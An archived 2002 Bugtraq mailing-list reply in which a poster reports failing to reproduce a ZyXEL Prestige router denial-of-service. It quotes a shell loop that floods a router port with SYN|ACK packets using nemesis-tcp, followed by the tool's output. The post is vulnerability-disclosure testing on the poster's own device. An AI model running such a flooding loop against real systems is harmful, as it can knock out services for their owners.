Sorry moderators, I accidentally replied with this to bugtraq, but it should probably have gone to vuln-dev. My apologies.

On Mon, Jun 17, 2002 at 02:59:11PM +0200, Kistler Ueli wrote:
> ZyXEL Prestige 642R-11 AJ.6 has a problem handling special packets.
> It is possible to send a packet that will make unavailable
> the router's services (Telnet&FTP, DHCP service not tested).
> Network traffic isn't stopped.
>
> Possibly more ZyNOS based routers are vulnerable. Please reply if you
> found any other ZyNOS based router vulnerable.

I was unable to reproduce this behavior on my Zyxel 643 ADSL router, even under extremely heavy (continuous) SYN|ACK packet flooding to several ports. An excerpt of one such test session follows, concluded with ZyNOS information.

Immediately after a single packet, during continuous bombardment, and afterwards, I was able to access the configuration menu via telnet. The FTP and HTTP services are disabled on my router, and the only firewall rule is to protect the SNMP service of the Zyxel itself from the WAN side, as I have a linux 2.4/netfilter box that protects the LAN side of the internal network.

Thanks for the heads-up, Kistler!

---

# while /bin/true; do nemesis-tcp -v -fS -fA -S xxx.xxx.xxx.xxx -D yyy.yyy.yyy.yyy -y 40023 -d eth0; done

[ ...repeatedly... ]

TCP Packet Injection -=- The NEMESIS Project 1.32
Copyright (C) 1999, 2000, 2001 Mark Grimes <obecianat_private>
Portions copyright (C) 2001 Jeff Nathan <jeffat_private>

[IP] xxx.xxx.xxx.xxx > yyy.yyy.yyy.yyy
[MAC] 00:90:27:62:5A:D6 > 0D:0E:0A:0D:00:01
[Ports] 42069 > 40023
[Flags] SYN ACK
[TCP Urgent Pointer] 2048
[Window Size] 512
[ACK number] 420
[Sequence number] 420
[IP ID] 0
[IP TTL] 254
[IP TOS] 0x18
[IP Frag] 0x4000
[IP Options]

Wrote 54 byte TCP packet through linktype 1
TCP Packet Injected

---

ZyNOS F/W Version: V2.50(AY.1) | 9/19/2001
ADSL Chipset Vendor: Alcatel, Version 3.6.70
Standard: G.DMT

--
[ rich henning ]           /"\
[ henninrpat_private ]     \ /   support the ascii ribbon campaign
                            X    against html e-mail
                           / \   pgp: http://diss0nance.lawngnome.org/pgp_public.txt
This archive was generated by hypermail 2b30 : Mon Jun 17 2002 - 20:14:49 PDT